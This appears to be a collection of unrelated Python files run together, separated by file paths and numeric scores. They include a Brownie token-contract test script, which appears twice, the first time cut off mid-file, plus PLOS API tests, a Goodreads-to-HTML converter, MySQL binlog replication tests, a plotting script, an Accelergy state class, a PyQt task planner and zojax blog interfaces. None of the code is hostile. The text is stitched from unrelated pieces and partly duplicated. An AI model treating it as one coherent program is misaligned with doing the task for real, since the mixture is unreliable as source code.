pussy_cat.transfer(arthur_lewyin, 500)
pussy_cat.transfer(tessia_earlith, 200)
# I like Caera but come on, Tessia is the one.
pussy_cat.transfer(caera_whats_her_face, 100)
# Burn
pussy_cat.burn(499, arthur_lewyin)
pretty_print_balance(arthur_lewyin)
pussy_cat.burn(199, tessia_earlith)
pretty_print_balance(tessia_earlith)
pussy_cat.burn(99, caera_whats_her_face)
pretty_print_balance(caera_whats_her_face)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Burn end -- \n")
def pause_tests():
print(" -- Pause start -- ")
# Fund the accounts first
pussy_cat.transfer(jay, 10000)
pussy_cat.transfer(shelly, 10000)
# Try to pause as a non-owner
pussy_cat.pause_contract(jay)
print("If it failed, good!")
pussy_cat.pause_contract(me)
print(pussy_cat.paused())
try:
# Try to transfer while paused
pussy_cat.transfer(shelly, 100, jay)
except:
pass
# Mint as owner
pussy_cat.mint(me, 400)
# Mint as non owner
pussy_cat.mint(shelly, 400, jay)
# Try to burn as a non-owner
pussy_cat.burn(200, jay)
# Now burn as owner
pussy_cat.burn(200, me)
# Unpause
pussy_cat.pause_contract(shelly)
print("It failed good!")
pussy_cat.pause_contract(me)
pussy_cat.transfer(jay, 100, shelly)
pussy_cat.mint(shelly, 400)
pussy_cat.burn(200, shelly)
print(" -- Pause end -- \n")
def role_tests():
print(" -- Role start -- ")
# Add roles
pussy_cat.add_role(rudeus_greyart, 1) # Admin
pussy_cat.add_role(eris_whats_her_face, 2) # Pauser
pussy_cat.add_role(seol_jihu, 3) # Minter
pussy_cat.add_role(jay, 3) # Minter
# Add to a role as admin
pussy_cat.add_role(arthur_lewyin, 2, rudeus_greyart)
# Remove from a role as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
# Now try to add an admin as admin
pussy_cat.add_role(arthur_lewyin, 1, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin)
# Now try to remove an admin as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.remove_role(arthur_lewyin)
# Now mint as a minter and pause as a pauser
pussy_cat.mint(seol_jihu, 400)
pussy_cat.pause_contract(eris_whats_her_face)
# Unpause as admin
pussy_cat.pause_contract(rudeus_greyart)
# And renounce role
pussy_cat.renounce_role(jay)
print(f"{address_to_name(jay)}'s role: {pussy_cat.role_of(jay)}")
print(" -- Role end -- \n")
def owner_tests():
print(" -- Owner start -- ")
# Send some tokens to Arthur (future owner)
pussy_cat.transfer(arthur_lewyin, 10000)
# Check who the owner is
print(address_to_name(pussy_cat.owner()))
# Check if Arthur already has a role
if pussy_cat.role_of(arthur_lewyin) != 0:
print("Arthur has role")
pussy_cat.remove_role(arthur_lewyin)
# Try as someone else to transfer to arthur
pussy_cat.change_owner(arthur_lewyin, caera_whats_her_face)
print("Should fail ^^")
# Now actually transfer to arthur
pussy_cat.change_owner(arthur_lewyin, me)
print(address_to_name(pussy_cat.owner()))
# Pause the contract and do the operations as Arthur
pussy_cat.pause_contract(arthur_lewyin)
pussy_cat.transfer(caera_whats_her_face, 500, arthur_lewyin)
pussy_cat.transfer(tessia_earlith, 1000, arthur_lewyin) # Because Tess is better
# Now renounce ownership
pussy_cat.stop_being_owner(arthur_lewyin)
print(pussy_cat.owner())
print(" -- Owner end -- \n")
def address_to_name(address):
name = "Unknown"
if address == me:
name = "Me"
elif address == rudeus_greyart:
name = "<NAME>"
elif address == eris_whats_her_face:
name = "Eris"
elif address == seol_jihu:
name = "<NAME>"
elif address == yeo_soohi:
name = "<NAME>"
elif address == arthur_lewyin:
name = "<NAME>"
elif address == tessia_earlith:
name = "<NAME>"
elif address == caera_whats_her_face:
name = "Caera"
elif address == jay:
name = "Jay"
elif address == shelly:
name = "Shelly"
return name
def pretty_print_balance(address):
print(f"{address_to_name(address)}: {pussy_cat.balance_of(address)}") | scripts/main.py | print(" -- Script start -- ")
from brownie import accounts
from .pcat import PCat
# Account names are not important, but they must be unique.
me = accounts[0]
# MT
rudeus_greyart = accounts[1]
eris_whats_her_face = accounts[2]
# TSCOG
seol_jihu = accounts[3]
yeo_soohi = accounts[4]
# TBATE
arthur_lewyin = accounts[5]
tessia_earlith = accounts[6]
caera_whats_her_face = accounts[7]
# WB
jay = accounts[8]
shelly = accounts[9]
# Deploy contract
pussy_cat = PCat(me)
def main():
print(" -- Main start -- ")
# Chequea data
print(pussy_cat.name())
print(pussy_cat.symbol())
print(pussy_cat.decimals())
print(pussy_cat.total_supply())
# transfer_tests()
# mint_tests()
# burn_tests()
pause_tests()
# role_tests()
# owner_tests()
print(" -- Main end -- ")
def transfer_tests():
print(" -- Transfer start -- ")
# Intenta transferir normal
pussy_cat.transfer(rudeus_greyart, 100)
# Intenta transferir sin saldo
try:
pussy_cat.transfer(rudeus_greyart, 100, eris_whats_her_face)
print("Nope")
except:
print("Success")
pussy_cat.transfer(rudeus_greyart, 100, me)
# Transfer from redeus
pussy_cat.transfer(eris_whats_her_face, 100, rudeus_greyart)
# Transfer from redeus to himseld
pussy_cat.transfer(rudeus_greyart, 10, rudeus_greyart)
pretty_print_balance(rudeus_greyart)
pretty_print_balance(me)
pretty_print_balance(eris_whats_her_face)
print(" -- Transfer end -- \n")
def mint_tests():
print(" -- Mint start -- ")
# Send some tokens to TSCOG characters
pussy_cat.transfer(seol_jihu, 100)
pussy_cat.transfer(yeo_soohi, 100)
pretty_print_balance(me)
# Add some tokens to me
pussy_cat.mint(me, 400)
pretty_print_balance(me)
print(f"Total supply: {pussy_cat.total_supply()}")
# Try and mint as a non roler
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
# Make yeo_soohi a roler
pussy_cat.add_role(yeo_soohi, 3)
pussy_cat.mint(seol_jihu, 400, yeo_soohi)
pretty_print_balance(seol_jihu)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Mint end -- \n")
def burn_tests():
print(" -- Burn start -- ")
# Send some tokens to TBATE characters
pussy_cat.transfer(arthur_lewyin, 500)
pussy_cat.transfer(tessia_earlith, 200)
# I like Caera but comeon Tessia is the one.
pussy_cat.transfer(caera_whats_her_face, 100)
# Burn
pussy_cat.burn(499, arthur_lewyin)
pretty_print_balance(arthur_lewyin)
pussy_cat.burn(199, tessia_earlith)
pretty_print_balance(tessia_earlith)
pussy_cat.burn(99, caera_whats_her_face)
pretty_print_balance(caera_whats_her_face)
print(f"Total supply: {pussy_cat.total_supply()}")
print(" -- Burn end -- \n")
def pause_tests():
print(" -- Pause start -- ")
# Cause buhl fresh
pussy_cat.transfer(jay, 10000)
pussy_cat.transfer(shelly, 10000)
# Intenta pause
pussy_cat.pause_contract(jay)
print("If failed good!")
pussy_cat.pause_contract(me)
print(pussy_cat.paused())
try:
# Intenta transfer
pussy_cat.transfer(shelly, 100, jay)
except:
pass
# Mint as owner
pussy_cat.mint(me, 400)
# Mint as non owner
pussy_cat.mint(shelly, 400, jay)
# Intenta burn
pussy_cat.burn(200, jay)
# Now burn as owner
pussy_cat.burn(200, me)
# Unpause
pussy_cat.pause_contract(shelly)
print("It failed good!")
pussy_cat.pause_contract(me)
pussy_cat.transfer(jay, 100, shelly)
pussy_cat.mint(shelly, 400)
pussy_cat.burn(200, shelly)
print(" -- Pause end -- \n")
def role_tests():
print(" -- Role start -- ")
# Add roles
pussy_cat.add_role(rudeus_greyart, 1) # Admin
pussy_cat.add_role(eris_whats_her_face, 2) # Pauser
pussy_cat.add_role(seol_jihu, 3) # Minter
pussy_cat.add_role(jay, 3) # Minter
# Add to a role as admin
pussy_cat.add_role(arthur_lewyin, 2, rudeus_greyart)
# Remove from a role as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
# Now try to add a admin as admin
pussy_cat.add_role(arthur_lewyin, 1, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.add_admin(arthur_lewyin)
# Now try to remove a admin as admin
pussy_cat.remove_role(arthur_lewyin, rudeus_greyart)
print("It failed good!")
pussy_cat.remove_role(arthur_lewyin)
# Now mint as a minter and puase as a pauser
pussy_cat.mint(seol_jihu, 400)
pussy_cat.pause_contract(eris_whats_her_face)
# Unpause as admin
pussy_cat.pause_contract(rudeus_greyart)
# And renounce role
pussy_cat.renounce_role(jay)
print(f"{address_to_name(jay)}'s role: {pussy_cat.role_of(jay)}")
print(" -- Role end -- \n")
def owner_tests():
print(" -- Owner start -- ")
# Send some tokens to Artur (Future owner)
pussy_cat.transfer(arthur_lewyin, 10000)
# Chequea quien es owner
print(address_to_name(pussy_cat.owner()))
# Chequea is arthur already has a role
if pussy_cat.role_of(arthur_lewyin) != 0:
print("Arthur has role")
pussy_cat.remove_role(arthur_lewyin)
# Try as someone else to transfer to arthur
pussy_cat.change_owner(arthur_lewyin, caera_whats_her_face)
print("Should fail ^^")
# Now actually transfer to arthur
pussy_cat.change_owner(arthur_lewyin, me)
print(address_to_name(pussy_cat.owner()))
# Pause el contract y hacemos la vaina como author
pussy_cat.pause_contract(arthur_lewyin)
pussy_cat.transfer(caera_whats_her_face, 500, arthur_lewyin)
pussy_cat.transfer(tessia_earlith, 1000, arthur_lewyin) # Because Tess is better
# Now renouce ownership
pussy_cat.stop_being_owner(arthur_lewyin)
print(pussy_cat.owner())
print(" -- Owner end -- \n")
def address_to_name(address):
name = "Unknown"
if address == me:
name = "Me"
elif address == rudeus_greyart:
name = "<NAME>"
elif address == eris_whats_her_face:
name = "Eris"
elif address == seol_jihu:
name = "<NAME>"
elif address == yeo_soohi:
name = "<NAME>"
elif address == arthur_lewyin:
name = "<NAME>"
elif address == tessia_earlith:
name = "<NAME>"
elif address == caera_whats_her_face:
name = "Caera"
elif address == jay:
name = "Jay"
elif address == shelly:
name = "Shelly"
return name
def pretty_print_balance(address):
print(f"{address_to_name(address)}: {pussy_cat.balance_of(address)}") | 0.157914 | 0.124985 |
import arcas
import pandas
def test_setup():
api = arcas.Plos()
assert api.standard == 'http://api.plos.org/search?q='
def test_keys():
api = arcas.Plos()
assert api.keys() == ['url', 'key', 'unique_key', 'title', 'author', 'abstract',
'doi', 'date', 'journal', 'provenance', 'category', 'score',
'open_access']
def test_parameters_and_url_author():
api = arcas.Plos()
parameters = api.parameters_fix(author='Glynatsi')
assert parameters == ['author:"Glynatsi"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=author:"Glynatsi"'
def test_parameters_and_url_title():
api = arcas.Plos()
parameters = api.parameters_fix(title='Game')
assert parameters == ['title:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Game"'
def test_parameters_and_url_abstract():
api = arcas.Plos()
parameters = api.parameters_fix(abstract='Game')
assert parameters == ['abstract:"Game"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=abstract:"Game"'
def test_parameters_and_url_category():
api = arcas.Plos()
parameters = api.parameters_fix(category='game theory')
assert parameters == ['subject:"game theory"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=subject:"game theory"'
def test_parameters_and_url_journal():
api = arcas.Plos()
parameters = api.parameters_fix(journal='PLOS ONE')
assert parameters == ['journal:"PLOS ONE"']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=journal:"PLOS ONE"'
def test_parameters_and_url_record():
api = arcas.Plos()
parameters = api.parameters_fix(records=1)
assert parameters == ['rows=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=rows=1'
def test_parameters_and_url_start():
api = arcas.Plos()
parameters = api.parameters_fix(start=1)
assert parameters == ['start=1']
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=start=1'
def test_create_url_search():
api = arcas.Plos()
parameters = api.parameters_fix(title='Nash', abstract='mixed', records=2, start=5)
url = api.create_url_search(parameters)
assert url == 'http://api.plos.org/search?q=title:"Nash"+AND+abstract:"mixed"&rows=2&start=5'
def test_to_dataframe():
dummy_article = {'response': [],
'id': '10.0000/journal.pone.00000',
'journal': 'PLOS ONE',
'publication_date': '2010-12-12T00:00:00Z',
'article_type': 'Research Article',
'author_display': ['<NAME>', '<NAME>'],
'abstract': "Abstract",
'title_display': "Title",
'score': '10'}
api = arcas.Plos()
article = api.to_dataframe(dummy_article)
assert isinstance(article, pandas.core.frame.DataFrame)
assert list(article.columns) == api.keys()
assert len(article['url']) == 2
assert article['url'].unique()[0] == 'https://doi.org/' + dummy_article['id']
assert article['key'].unique()[0] == 'Glynatsi2010'
assert article['title'].unique()[0] == 'Title'
assert article['abstract'].unique()[0] == 'Abstract'
assert article['journal'].unique()[0] == 'PLOS ONE'
assert article['date'].unique()[0] == 2010
assert article['doi'].unique()[0] == dummy_article['id']
assert article['open_access'].unique()[0] == 'Not available'
assert article['score'].unique()[0] == 10 | tests/test_plos.py | 0.595728 | 0.454351 |
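# --- Usage sketch distilled from the assertions above (added for
# illustration): arcas.Plos composes PLOS search URLs from keyword filters.
import arcas

api = arcas.Plos()
parameters = api.parameters_fix(author='Glynatsi', records=2)
url = api.create_url_search(parameters)
# Based on the tests above, url should come out something like:
# http://api.plos.org/search?q=author:"Glynatsi"&rows=2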
import xml.etree.ElementTree as ET
import sys
from html.parser import HTMLParser
class MLStripper(HTMLParser):
def __init__(self):
self.reset()
self.strict = False
self.convert_charrefs = True
self.fed = []
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return "".join(self.fed)
def strip_tags(html):
s = MLStripper()
s.feed(html)
return s.get_data()
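# --- Minimal demo of the MLStripper-based helper above (added for
# illustration):
# strip_tags("<p>Hello <b>world</b>!</p>")  -> "Hello world!"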
def cleantext(data):
if data is not None:
return data.strip()
return ""
def getStars(rating):
stars = ""
if rating == 0:
stars = "N/A"
else:
for i in range(0, rating):
stars += '<span class="glyphicon glyphicon-star" aria-hidden="true"></span>'
return stars
def main():
goodreadsxml = sys.argv[1]
root = ET.parse(goodreadsxml).getroot()
# print(
# "<thead><tr><th /><th>Title</th><th>Author</th><th>My rating</th></tr></thead><tbody>"
# )
reviewsfh = open("_includes/goodreadsreviews.html", "w")
bookindex = 0
for item in root.iter("item"):
bookindex = bookindex + 1
title = cleantext(item.find("title").text)
author = cleantext(item.find("author_name").text)
rating = int(strip_tags(cleantext(item.find("user_rating").text)))
# rating = 5
img = cleantext(item.find("book_small_image_url").text)
user_review = cleantext(item.find("user_review").text)
book_description = cleantext(item.find("book_description").text)
book_description = strip_tags(book_description)
book_description = (book_description.encode('ascii', 'ignore')).decode("utf-8")
if user_review:  # cleantext() returns "", never None, for a missing review
user_review = strip_tags(user_review)
else:
user_review = str(rating) + " stars"
reviewsfh.write(
'<tr class="accordion-toggle" data-toggle="collapse" data-target="#%s">'
% ("book" + str(bookindex))
)
reviewsfh.write('<td><img src="%s"/></td>' % img)
reviewsfh.write("<td>%s</td>" % title)
reviewsfh.write("<td>%s</td>" % author)
reviewsfh.write(
'<td><a href="#" data-toggle="tooltip" data-placement="top" title="%s">'
% user_review
)
reviewsfh.write(getStars(rating))
reviewsfh.write("</td></tr>")
reviewsfh.write(
'<tr><td class="zeroPadding" colspan="5"><div id="%s" class="collapse">%s</div></tr>'
% ("book" + str(bookindex), book_description)
)
reviewsfh.write("</tbody>")
if __name__ == "__main__":
main() | script/parsegoodreads.py | 0.159054 | 0.134975 |
from __future__ import absolute_import
from __future__ import unicode_literals
from datetime import datetime
import mock
import pytest
from pymysqlreplication.event import GtidEvent
from pymysqlreplication.event import QueryEvent
from replication_handler.components.simple_binlog_stream_reader_wrapper import SimpleBinlogStreamReaderWrapper
from replication_handler.util.misc import DataEvent
from replication_handler.util.misc import ReplicationHandlerEvent
from replication_handler.util.position import GtidPosition
from replication_handler.util.position import LogPosition
class TestSimpleBinlogStreamReaderWrapper(object):
@pytest.yield_fixture
def patch_stream(self):
with mock.patch(
'replication_handler.components.simple_binlog_stream_reader_wrapper.LowLevelBinlogStreamReaderWrapper'
) as mock_stream:
yield mock_stream
def test_yield_events_when_gtid_enabled(self, mock_db_connections, patch_stream):
gtid_event_0 = mock.Mock(spec=GtidEvent, gtid="sid:11")
query_event_0 = mock.Mock(spec=QueryEvent)
query_event_1 = mock.Mock(spec=QueryEvent)
gtid_event_1 = mock.Mock(spec=GtidEvent, gtid="sid:12")
data_event_0 = mock.Mock(spec=DataEvent)
data_event_1 = mock.Mock(spec=DataEvent)
data_event_2 = mock.Mock(spec=DataEvent)
event_list = [
gtid_event_0,
query_event_0,
data_event_0,
data_event_1,
data_event_2,
gtid_event_1,
query_event_1,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
# set offset to 1, meaning we want to skip event at offset 0
stream = SimpleBinlogStreamReaderWrapper(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
GtidPosition(
gtid="sid:10",
offset=1
),
gtid_enabled=True
)
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=GtidPosition(gtid="sid:11", offset=2)
),
ReplicationHandlerEvent(
event=data_event_2,
position=GtidPosition(gtid="sid:11", offset=3)
),
ReplicationHandlerEvent(
event=query_event_1,
position=GtidPosition(gtid="sid:12", offset=0)
)
]
for replication_event, result in zip(stream, results):
assert replication_event.event == result.event
assert replication_event.position.gtid == result.position.gtid
assert replication_event.position.offset == result.position.offset
def test_meteorite_and_sensu_alert(
self,
mock_db_connections,
patch_stream
):
if not SimpleBinlogStreamReaderWrapper.is_meteorite_sensu_supported():
pytest.skip("meteorite and sensu are unsupported in open source version.")
from data_pipeline.tools.meteorite_gauge_manager import MeteoriteGaugeManager
from data_pipeline.tools.sensu_alert_manager import SensuAlertManager
with mock.patch.object(
MeteoriteGaugeManager,
'periodic_process'
) as mock_meteorite, mock.patch.object(
SensuAlertManager,
'periodic_process'
) as mock_sensu_alert:
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
assert mock_meteorite.call_count == 1
assert mock_sensu_alert.call_count == 1
def test_yield_event_with_heartbeat_event(
self,
mock_db_connections,
patch_stream,
):
stream, results = self._setup_stream_and_expected_result(
mock_db_connections.source_database_config,
mock_db_connections.tracker_database_config,
patch_stream
)
for replication_event, result in zip(stream, results):
assert replication_event.event == result.event
assert replication_event.position.log_pos == result.position.log_pos
assert replication_event.position.log_file == result.position.log_file
assert replication_event.position.offset == result.position.offset
assert replication_event.position.hb_serial == result.position.hb_serial
assert replication_event.position.hb_timestamp == result.position.hb_timestamp
def _setup_stream_and_expected_result(
self,
source_database_config,
tracker_database_config,
patch_stream
):
log_pos = 10
log_file = "binlog.001"
row = {"after_values": {
"serial": 123,
# This timestamp is Wed, 21 Oct 2015 12:05:27 GMT
"timestamp": datetime.fromtimestamp(1445429127)
}}
heartbeat_event = mock.Mock(
spec=DataEvent,
schema='yelp_heartbeat',
log_pos=log_pos,
log_file=log_file,
row=row
)
data_event_0 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_1 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
data_event_2 = mock.Mock(spec=DataEvent, table="business", schema="yelp")
event_list = [
heartbeat_event,
data_event_0,
data_event_1,
data_event_2,
]
patch_stream.return_value.peek.side_effect = event_list
patch_stream.return_value.pop.side_effect = event_list
stream = SimpleBinlogStreamReaderWrapper(
source_database_config,
tracker_database_config,
LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=0
),
gtid_enabled=False,
)
# Since the offset is 0, the results should start at offset 1, skipping
# data_event_0, which is at offset 0.
results = [
ReplicationHandlerEvent(
event=data_event_1,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=1,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
),
ReplicationHandlerEvent(
event=data_event_2,
position=LogPosition(
log_pos=log_pos,
log_file=log_file,
offset=2,
hb_serial=123,
# This is Wed, 21 Oct 2015 12:05:27 GMT
hb_timestamp=1445429127,
)
)
]
return stream, results | tests/components/simple_binlog_stream_reader_wrapper_test.py | 0.644001 | 0.236153 |
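# --- (Added aside) the tests above lean on mock's side_effect-with-a-list
# behaviour: each call to the patched peek()/pop() returns the next element
# of event_list in order.
from unittest import mock

m = mock.Mock()
m.get.side_effect = [1, 2]
assert m.get() == 1
assert m.get() == 2  # a third call would raise StopIteration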
import numpy as np
import json
import os
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import matplotlib.patches as mpatches
from matplotlib.patches import Patch
from matplotlib.lines import Line2D
pink = '#EC6779'
green = '#288737'
blue = '#4678a8'
yellow = '#CBBA4E'
cyan = '#6BCCeC'
magenta = '#A83676'
nameA = "ours_stonehenge_compare1"
nameB = "rrt_stonehenge_compare1"
nameC = "minsnap_stonehenge_compare1"
names = [nameA, nameB, nameC]
pretty_names = ["Ours", "RRT", "Min Snap"]
# fig = plt.figure(figsize=plt.figaspect(8/11))
# fig = plt.figure(figsize=(11,8))
# ax = fig.add_subplot(1, 1, 1)
def get_latest_train(name):
save_number = 0
while True:
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
# print(filepath)
if not os.path.isfile(filepath):
if save_number == 0:
assert False, "can't find any trajectory"
save_number -= 1
filepath = 'experiments/' + name + '/train/' +str(save_number)+".json"
return filepath
save_number+=1
def mean(array):
return sum(array)/len(array)
collision = []
control = []
handles =[]
# ax_twin = ax.twinx()
for name in names:
data = json.load(open(get_latest_train(name)))
print(name, "total", mean(data['total_cost']))
print(name, "colision", mean(data['colision_loss']))
collision.append(mean(data['colision_loss']))
control.append(mean(data['total_cost']) - mean(data['colision_loss'] ))
# ax.plot(data['total_cost'], c =color, linestyle='--', linewidth =3)
# ax_twin.plot(data['colision_loss'], c=color, linewidth =3)
# patch = mpatches.Patch(color=color, label = name)
# handles.append(patch)
fig = plt.figure(figsize=(11,8))
left_ax = fig.add_subplot(1, 1, 1)
right_ax = left_ax.twinx()
legend_elements = []
ind = np.arange(len(control))
width = 0.35
left_ax.bar(ind, collision, width, label='Collision', color=pink, log=True)
legend_elements.append( Patch(facecolor=pink, label='Collision') )
right_ax.bar(ind + width, control, width, label='Control', color=green, log=True)
legend_elements.append( Patch(facecolor=green, label='Control') )
left_ax.set_ylabel('NeRF Collision Cost', fontsize=30)
right_ax.set_ylabel('Control Effort', fontsize=30)
plt.title('Planner Comparison', fontsize=30)
plt.xticks(ind + width / 2, tuple(pretty_names) , fontsize=30)
left_ax.set_xticklabels(tuple(pretty_names), rotation=0, fontsize=30)
# left_ax.legend(loc='best')
# right_ax.legend(loc='best')
plt.legend(handles=legend_elements, prop={"size":20} , loc=2)
plt.show() | tools/plot_planner_compare.py | 0.400046 | 0.382776 |
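# --- Minimal, self-contained sketch of the twin-axis grouped-bar pattern
# used above (added for illustration; the data values are made up).
import numpy as np
import matplotlib.pyplot as plt

ind = np.arange(3)
width = 0.35
fig, left_ax = plt.subplots(figsize=(11, 8))
right_ax = left_ax.twinx()
left_ax.bar(ind, [1e-2, 1e-1, 5e-2], width, color='#EC6779', log=True)
right_ax.bar(ind + width, [10.0, 30.0, 20.0], width, color='#288737', log=True)
left_ax.set_xticks(ind + width / 2)
left_ax.set_xticklabels(["Ours", "RRT", "Min Snap"])
plt.show()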
from accelergy.utils import *
class SystemState():
def __init__(self):
self.cc_classes = {}
self.pc_classes = {}
self.arch_spec = None
self.hier_arch_spec = None
self.ccs = {}
self.pcs = {}
self.action_counts = None
self.plug_ins = []
self.ERT = None
self.ART = None
self.parser_version = None
self.flags = {}
self.energy_estimations = None
def set_flag_s(self, flag_name_val_dict):
self.flags.update(flag_name_val_dict)
def set_accelergy_version(self, version):
self.parser_version = version
def set_hier_arch_spec(self, arch_dict):
ASSERT_MSG(self.hier_arch_spec is None, 'interpreted input arch is set')
self.hier_arch_spec = arch_dict
def set_arch_spec(self, arch_spec):
ASSERT_MSG(self.arch_spec is None, 'architecture spec is already set')
self.arch_spec = arch_spec
def add_cc_class(self, cc_class):
cc_class_name = cc_class.get_name()
ASSERT_MSG(cc_class_name not in self.cc_classes, '%s compound class is already added'%(cc_class_name))
self.cc_classes[cc_class_name] = cc_class
def add_pc_class(self, pc_class):
pc_class_name = pc_class.get_name()
ASSERT_MSG(pc_class_name not in self.pc_classes, '%s primitive class is already added'%(pc_class_name))
self.pc_classes[pc_class_name] = pc_class
def add_cc(self, cc):
cc_name = cc.get_name()
ASSERT_MSG(cc_name not in self.ccs, '%s compound component is already added'%(cc_name))
self.ccs[cc_name] = cc
def add_pc(self, pc):
pc_name = pc.get_name()
ASSERT_MSG(pc_name not in self.pcs, '%s primitive component is already added'%(pc_name))
self.pcs[pc_name] = pc
def add_plug_ins(self, plug_ins):
ASSERT_MSG(type(plug_ins) is list, 'plug in objects need to be passed in as a list')
self.plug_ins = plug_ins
def set_ERT(self, ERT):
self.ERT = ERT
def set_ART(self, ART):
self.ART = ART
def set_action_counts(self, action_counts):
self.action_counts = action_counts
def set_energy_estimations(self, energy_estimations):
self.energy_estimations = energy_estimations | accelergy/system_state.py | 0.531939 | 0.14624 |
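# --- Hedged usage sketch (added): SystemState is a plain accumulator that
# other Accelergy stages populate. The calls below only use methods defined
# above; the flag name is hypothetical.
state = SystemState()
state.set_accelergy_version(0.3)
state.set_flag_s({'verbose': True})
# add_cc_class/add_pc_class/add_cc/add_pc assert the same name is never
# registered twice; set_arch_spec and set_hier_arch_spec assert set-once.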
import sys
from PyQt5.QtWidgets import (
QWidget,
QPushButton,
QHBoxLayout,
QVBoxLayout,
QApplication,
QMainWindow,
QAction,
QGridLayout,
QScrollArea,
QLabel,
QListWidget,
QListWidgetItem,
QAbstractItemView,
QLineEdit,
QDateEdit,
QCheckBox
)
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import Qt, QDateTime
from task import Task
app = QApplication(sys.argv)
class NewTaskWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.subject = QLineEdit("Subject:")
self.h.addWidget(self.subject)
self.what = QLineEdit("What:")
self.h.addWidget(self.what)
self.deadline = QDateEdit(calendarPopup=True)
self.h.addWidget(self.deadline)
self.deadline.setDateTime(QDateTime.currentDateTime())
self.info = QLabel("Mark as important:")
self.h.addWidget(self.info)
self.important = QCheckBox()
self.h.addWidget(self.important)
self.submitbutton = QPushButton("Submit")
self.submitbutton.clicked.connect(self.submit)
self.h.addWidget(self.submitbutton)
self.setLayout(self.h)
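# (Added aside) QLineEdit("Subject:") sets the field's *initial text*, which
# the user has to delete; for grey hint text that disappears on focus, the
# usual Qt idiom is:
#   self.subject = QLineEdit()
#   self.subject.setPlaceholderText("Subject:")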
def submit(self):
# Creates new Task
subject = self.subject.text()
what = self.what.text()
deadline = self.deadline.date()
important = self.important.isChecked()
newtask = Task(subject, what, deadline, important)
# Todo: Add Task to QListWidget, save task
class TasksWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.h = QHBoxLayout(self)
self.scroll = QScrollArea()
self.scroll.setWidgetResizable(True)
self.scrollcontent = QListWidget(self.scroll)
for i in range(20):
a = QListWidgetItem(str(i))
self.scrollcontent.addItem(a)
self.scroll.setWidget(self.scrollcontent)
self.h.addWidget(self.scroll)
self.setLayout(self.h)
class MainWidget(QWidget):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.v = QVBoxLayout(self)
self.v.addWidget(QLabel("Create new Task:"))
self.v.addWidget(NewTaskWidget())
self.v.addWidget(QLabel("Tasks:"))
self.v.addWidget(TasksWidget())
self.setLayout(self.v)
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.initMe()
def initMe(self):
self.setWindowTitle("Homeworkplanner") # Change later to better name
# self.setWindowIcon(QIcon("someIcon.png"))
self.main = MainWidget()
self.setCentralWidget(self.main)
self.show()
# opens the Window
w = MainWindow()
# Closes App when Window is closed
sys.exit(app.exec_()) | main.py | 0.197251 | 0.064095 |
from zope import interface, schema
from zope.i18nmessageid import MessageFactory
from zojax.content.feeds.interfaces import IRSS2Feed
from zojax.content.type.interfaces import IItem, IContent
from zojax.content.space.interfaces import IWorkspace, IWorkspaceFactory
from zojax.content.notifications.interfaces import IContentNotification
from zojax.filefield.field import ImageField
from zojax.richtext.field import RichText
from zojax.security.interfaces import IPermissionCategory
from zojax.widget.checkbox.field import CheckboxList
_ = MessageFactory('zojax.blogger')
class IBlog(IItem):
""" Blog """
dates = interface.Attribute('Dates')
index = interface.Attribute('Primary index')
pageSize = schema.Int(
title=_(u'Page size'),
description=_(u'Number of entries per page.'),
default=10)
def entries():
"""List entries names."""
class IBlogPostListing(interface.Interface):
"""Blog post listing"""
def update(post):
"""Update post index."""
def remove(post, name):
"""Remove post from index."""
class IBlogPost(interface.Interface):
""" Blog post """
title = schema.TextLine(
title=_(u'Title'),
description=_(u'Post title.'),
default=u'',
missing_value=u'',
required=True)
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=True)
abstract = RichText(
title=_(u'Abstract'),
description=_(u'Blog post abstract text.'),
required=True)
image = ImageField(
title=_(u'Image'),
description=_(u'Image for Blog post.'),
required=False)
date = schema.Datetime(
title=_('Publish Date / Time'),
description=_('Post date.'),
required=True)
category = CheckboxList(
title=_(u'Category'),
description=_('Select category for blog post.'),
vocabulary='zojax.blogger-categories',
default=[],
required=False)
published = schema.Bool(
title=_(u'Published'),
default=None,
required=False
)
class IBlogPostType(interface.Interface):
""" Blog post content type """
class ICategory(IItem):
""" Entries Category """
class ICategoryContainer(interface.Interface):
""" Categories container """
class IBloggerProduct(interface.Interface):
""" product """
usePostAbstractField = schema.Bool(
title=_(u'Use post abstract field'),
description=_(u'Use post abstract field on post view.'),
default=False)
